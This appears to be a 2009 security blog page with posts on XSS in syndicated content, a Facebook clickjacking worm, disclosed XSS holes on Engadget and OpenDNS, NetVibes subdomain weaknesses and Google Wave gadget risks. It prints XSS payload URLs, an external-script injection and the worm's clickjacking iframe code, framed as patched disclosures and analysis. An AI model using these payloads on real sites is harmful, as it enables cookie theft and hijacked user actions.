Dec. 8, 2009

Posted by in General, Google | 4 comments

Security in Syndicated and Federated Systems

In an amusing story earlier this year, a technology news reporter writing on a particular security problem unwittingly demonstrated the issue by publishing an article. ReadWriteWeb posted a story on cross-site scripting holes on McAfee’s web site, and the article included some sample code that could be used in an attack. Unfortunately, the New York Times syndicates some articles from RWW, including this one on XSS, and at the time did not filter code in RWW reports. Consequently, the sample code actually rendered in the New York Times version of the article, producing another example of cross-site scripting.

In broad strokes, a syndicated system occurs when one application or network loads content from another (one-way) while a federated system involves two applications or networks exchanging content in a fully interoperable fashion (two-way). RSS is a syndicated setup – your reader simply loads an XML feed from the site you subscribe to. E-mail is a federated system – many SMTP servers exchange messages with each other.

Both syndicated and federated systems have to deal with a potential security problem: outside content. Any time you load data (particualrly in a web application) that’s not under your control, you need to put in filters to avoid such issues as cross-site scripting. The problem here is not a matter of trust – I’m sure the New York Times considered ReadWriteWeb a trusted source. The problem is that other sources of content may not always provide what your application is expecting. Rather than assume the data’s formatted and encoded correctly, assume it’s not and take appropriate action. This is merely one example of the type of thinking security researchers routinely employ – and a mindset developers need to use more often.

I recently came across another minor example of syndication leading to XSS. The search engine Cuil recently announced that they were launching an opt-in feature to index the posts of your friends on Facebook and include those posts in your search results. Aside from the privacy ramifications (you may be surprised to learn that settings for uninstalled apps and Facebook Connect sites don’t seem to apply to Cuil’s search results), I wondered how secure Cuil’s implementation would be in practice.

Overall, the feature seems to work like most Facebook Connect sites, and thus poses no inherent security problems. However, I did find quickly that Cuil was not encoding the results from Facebook. That is, a friend could post a status saying, “testing <script>alert(document.cookie)</script>” and searching for “testing” in Cuil would load the alert dialog. Obviously the impact of such an attack would be minimal, as it requires jumping through a few hoops first, but it again illustrates accidental XSS via syndicated content. Note that XSS in a Facebook Connect application would open the door to a FAXX-style attack.

An example of a federated system that causes me some concern is Google Wave. When I first started looking at Google Wave from a security standpoint, I admit that I did not fully understand the architecture of the product. In essence, Wave includes two distinct components – a server and a client. On the server end, Wave is an XMPP service that can communicate with any compatible setup. On the client side, Wave is the web interface hosted at wave.google.com for loading messages from servers.

Once I understood this division, I thought it even more important to discuss the security implications of gadgets within waves. I fully expect Google to address most, if not all, of the issues I raised regarding gadgets. (In fact, last time I checked, it appeared they had changed the domains of container iframes, stopping cross-gadget access). But if Wave really does catch on, Google’s client interface will not be the only one on the market. Since gadgets render as HTML/CSS/JavaScript, Wave clients will almost assuredly have some sort of web browser component. If the company that invented Wave did not factor in some of the security considerations I and others have noted in their original client, there’s a good chance other developers will not take into account similar issues unless people raise awareness.

However, security in Wave clients deals with only one direction of a federated system. I’m still wondering how certain aspects of federated waves will work in practice. For instance, from what I understand, each thread of messages in Wave will be stored on the server hosting the thread. What will happen if that server becomes suddenly unavailable? How will corporate record-keeping and e-discovery And while Google’s Wave servers will likely be quite secure, what about other servers?

Granted, some questions about Wave servers could be raised about similar systems, such as e-mail. But several of the decentralized aspects of Wave distinguish it from a typical e-mail setup, and could prove to be good experiments in light of proposals for decentralized social networking. I’ve long supported the idea of distributed social networking, but also felt it could lead to many performance and usability problems not found in a walled garden (I’ve been meaning to write a blog post entitled “In Defense of Walled Gardens” for at least a year). Wave may be one of the first large-scale attempts at building a distributed application somewhat akin to social networking.

Keep Reading »
Nov. 23, 2009

Posted by in Facebook | 10 comments

Facebook Worm Uses Clickjacking in the Wild

Reports have been spreading today of a new Facebook worm that posts a link to the infection page on people’s profiles. The infection page itself includes a button that users are told to click, with the promise of seeing “something hot” or dominating FarmVille. Nick FitzGerald at AVG posted a walkthrough of the worm (warning: slightly NSFW image), and when explaining how the worm operated, gave an explanation similar to that of other articles I saw:

A sequence of iframes on the exploit page call a sequence of other pages and scripts, eventually resulting in a form submission to Facebook “as if” the victim had submitted a URL for a wall post and clicked on the “Share” button to confirm the post.

With all due respect to FitzGerald and others, I was suspicious. First, I know from experience what sort of CSRF protections Facebook has put in place. Second, if this were truly just CSRF, why not execute the attack on loading the page instead of requiring a second click?

I do know of one relative of CSRF attacks (some classify it as simply CSRF, but I do see a distinction) that requires another click, and that’s clickjacking. I decided to check out an infection page to see exactly what was going on.

Sure enough, both the “hot” and “dominate FarmVille” pages load in invisible iframe, which calls for another local page, which in turn loads another invisible iframe. The actual source of the second local page looks like this (URI edited):

<html><head></head><body><div style=”overflow: hidden; width: 56px; height: 24px; position: relative;” id=”div”>
<iframe name=”iframe” src=”http://EVILURI/index.php?n=632″ style=”border: 0pt none ; left: -985px; top: -393px; position: absolute; width: 1618px; height: 978px;” scrolling=”no”></iframe></div></body></html>

The address that the iframe loads simply redirects to a Facebook share page with the infection page specified as the share link. Note that the style attribute on the iframe includes negative values for “left” and “top” – this ensures that when the page loads, the “Share” button for the Facebook page is at the top-left corner of the iframe, and thus positioned right underneath the button users think they are clicking.

It’s perhaps worth noting that the possibility of such a worm has been pointed out before, including on this blog:

All of the following actions can be mistakenly performed by a user simply clicking a link or button on an innocent-looking page via clickjacking:

Post a link to your profile. This is possible by applying clickjacking to several Facebook pages used for sharing content. A custom title and description can be set for the link. Other content, such as a Flash video, can also be posted this way.

I also encouraged Facebook in my Month of Facebook Bugs Report to take clickjacking seriously. The behavior of this worm is only the beginning – as I’ve pointed out for months, a similar attack could authorize a Facebook application (malicious or hijacked) and steal user information while spreading links even more virally. This new worm may be one of the first examples of clickjacking used in the wild, but it certainly won’t be the last.

Keep Reading »
Nov. 21, 2009

Posted by in General | No comments

XSS in Engadget’s New Site

I’m noticing a trend of sites patching the more obvious cross-site scripting vectors, such as search fields, but ignoring parameters in secondary pages, such as Ajax interfaces. Several applications in the Month of Facebook Bugs had pages for making Ajax calls or loading advertisements that were never meant to be loaded directly, yet doing so opened the door to XSS attacks. Keep in mind that any page on a given domain can access that domain’s cookies.

Yet another case in point came to my attention this week. I noticed that the technology news site Engadget had launched a redesign, and I began poking around the new site. After a little while, I came across four XSS vulnerabilities, all on the main www.engadget.com domain. I promptly reported the holes and they were silently patched in less than a day or two. Since they’ve all been fixed, I’ll list the example URIs I sent here for the record:

  • http://www.engadget.com/?a=ajax-comment-vote&commentid=%3Cscript%3Ealert(document.cookie)%3C/script%3E
  • http://www.engadget.com/?a=ajax-comment-show-replies&commentid=%3Cscript%3Ealert(document.cookie)%3C/script%3E
  • http://www.engadget.com/?a=ajax-comment-report&commentid=%3Cscript%3Ealert(document.cookie)%3C/script%3E
  • http://www.engadget.com/mm_track/Engadget/media/?title=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Previously, each one of these pages loaded the inserted script, which brings up an alert dialog containing the user’s cookies for Engadget. Kudos to the team behind Engadget for the quick fixes, and hopefully this will serve as another reminder to all developers to leave no page unchecked when evaluating security issues.

Keep Reading »
Nov. 16, 2009

Posted by in General | 2 comments

Real-Life Examples of Cross-Subdomain Issues

About two weeks ago, security researcher Mike Bailey posted a paper on cookie attacks via subdomains (hat tip: Jeremiah Grossman). I’ve seen several stories since then dealing with various subdomain security issues. In fact, the day after Bailey’s write-up, Yvo Schaap described several cases where Facebook and MySpace inadvertently exposed data through trust policies on particular subdomains.

I bring up subdomains to highlight two important considerations for developers. First, never ignore code hosted on subdomains. Your primary site may be secure, but vulnerabilities on one of your subdomains could still open you up to attacks. Second, make sure you understand how browsers handle subdomains. While generally subdomains are generally treated as separate from their parent domain, remember that changing document.domain can allow code to move up the DNS chain.

While Schaap illustrated the first point already, I can add one more example. A few weeks ago, I poked around a few OpenDNS pages, and noticed an oversight similar to some of the FAXX hacks I’d seen in September: an AJAX interface called directly rendered a good bit of HTML. While mostly filtered, I did come across one parameter that could be used to render injected code. The vulnerable page was hosted on guide.opendns.com, a subdomain used for presenting search results: http://guide.opendns.com/ajax_serp.php?q=&oq=><script src%3Dhttps://theharmonyguy.com/opendns.js></script>

OpenDNS patched this hole quickly after I disclosed it to them, and I doubt it would have had much serious impact. Any important cookies appear to be attached to www.opendns.com, which would not be accessible, and trying to change network properties would require accessing OpenDNS pages on HTTPS (and thus blocked by the browser).

I came across a striking example of my second point while reading about a new Twitter widget. A ReadWriteWeb reader commented that users of NetVibes, a custom home page service, could make use of the widgets by inserting them into an HTML widget available on NetVibes. I knew that the Twitter widgets required JavaScript, so I started testing NetVibes widgets in much the same way I looked at Google Wave gadgets.

Sure enough, NetVibes allowed JavaScript and iframes to be inserted into their widgets, though they again render in container iframes. More troublesome, though, is that these container iframes do not load in an entirely separate domain – they load in a subdomain of netvibes.com. Within minutes, I changed document.domain to netvibes.com and loaded the cookies associated with that domain. Thankfully my login cookies appear to only be tied to www.netvibes.com, and trying to load pages using URIs that don’t include “www” get forwarded to www.netvibes.com pages. Still, as much as I’ve criticized Google Wave’s gadget implementation, at least Google used a domain entirely separate from google.com for their gadgets. Finally, I would note that I could add potentially malicious NetVibes widgets to publicly accessible NetVibes pages, leading to persistent XSS issues.

As Bailey pointed out in his paper, “DNS was never intended to be a security feature.” Even with protections such as same-origin policies, I get a bit leery at times at how thin the walls preventing certain attacks can become. When building secure web applications, remember your subdomains and how they relate to each other.

Keep Reading »
Nov. 5, 2009

Posted by in General, Google | 2 comments

Why I Started Hacking Google Wave

After I posted concerns over security in Google Wave, several responses came (including one from Google) emphasizing that Wave was “still in an early preview stage” and many bugs would be fixed before a wider release. I think that clarifying why I would bother discussing bugs in a preview product may raise a few important points about web application security.

First, let me be clear about one point: I would not pretend to know more about application security than the engineers, programmers, and scientists at Google. In addition, I would not want to imply that Google does not care about security or user privacy. I realize that Google takes security issues seriously and has the resources to build highly secure products.

But those realizations are also a source of confusion for me when I observe decisions made about Google Wave. As an outsider, I don’t understand why Wave would include the problems I’ve outlined. What I’ve posted does not involve clever hacks or specific parameters – these problems involve weaknesses in the overall framework of Wave. And such weaknesses relate to well-known issues in application security. In fact, Google has previously addressed deploying third-party code by developing Caja after the launch of OpenSocial.

Returning to the “it’s a preview” argument, though, I would first respond by saying that applications, particularly ones that allow users to embed untrusted third-party code, should include security from the very beginning. Starting with an open model and trying to add restrictions later on is a recipe for disaster.

A larger issue in Wave’s case, though, is that Google has often cast Wave as a reinvention of SMTP e-mail. If you set expectations high, much will be expected of you. If a company with the reputation, resources, and revenue of Google markets a product as a replacement for traditional e-mail, I’m going to evaluate its security even more closely than normal. In my view, the hype that has already built around Wave and the reach it’s already found (Novell is reportedly planning a Wave-based business product in mid-2010) disallow the “preview” excuse.

In addition, if you’re going to reinvent e-mail, don’t forget lessons already learned from traditional e-mail. In a previous post, I outlined four major weaknesses I saw in Google Wave:

  1. Allowing scripts and iframes in gadgets with no limits apart from sandboxing
  2. Lack of control over what content or users can be added to a wave
  3. No simple mechanism for verifying gadget sources or features
  4. Automatically loading gadgets when a wave is viewed

Name one webmail interface that executes scripts in messages. Name one recent e-mail client that automatically loads content such as images in messages. Why were such considerations not part of Wave from the very start?

Of course, while Google has at least promised to include further permissions controls in Wave, such controls are one aspect of Wave intentionally left out in initial releases. While one can argue whether Google is correct in the merits of such collaboration, I’m a bit surprised that more of the security implications have not been raised before (at least not to my knowledge). When such changes will appear, though, remains to be seen. Personally, I find it a tad disconcerting that Google has similarly promised such updates as allowing users to turn off Wave’s real-time typing behavior, yet Wave has changed little since its announcement.

Still, I’m confident that Google will address at least some of the issues I’ve raised. If nothing else, I hope I’ve contributed to the public dialogue about Google Wave. I will add that Wave appears to include much security on the backend – most of the problems I’m seeing come in the client implementation. Let’s remember, though, that Wave will be federated. Another reason to bring up client security issues early is that other clients can learn from Google’s implementation. I’m rather concerned that if Wave interfaces proliferate, they may repeat many of the security problems seen in early e-mail interfaces.

I’m also concerned that Wave is not really addressing many of the issues that have plagued e-mail. The current “chaos” with Wave’s lack of permissions does not bode well for how it will handle spam, for instance. Whitelisting alone won’t do the trick. In fact, I would argue that Wave is a collaboration tool, not a communication tool, and thus not a replacement for e-mail.

In conclusion, I’d simply add one more point. While it’s exciting to find exploits such as specific XSS holes on a web site, it’s often more important to raise awareness regarding larger security issues that relate to the overall framework of an application. That’s why I’ve discussed FAXX hacks so much, as they relate to the overall implementation of the Facebook Platform instead of particular vulnerabilities.

Similarly, my concerns about Google Wave thus far involve behaviors built into the current system that open the door for exploiting the privacy and security of users. Preview or not, Wave needs to address these high-level weaknesses if it’s going to match the hype.

Keep Reading »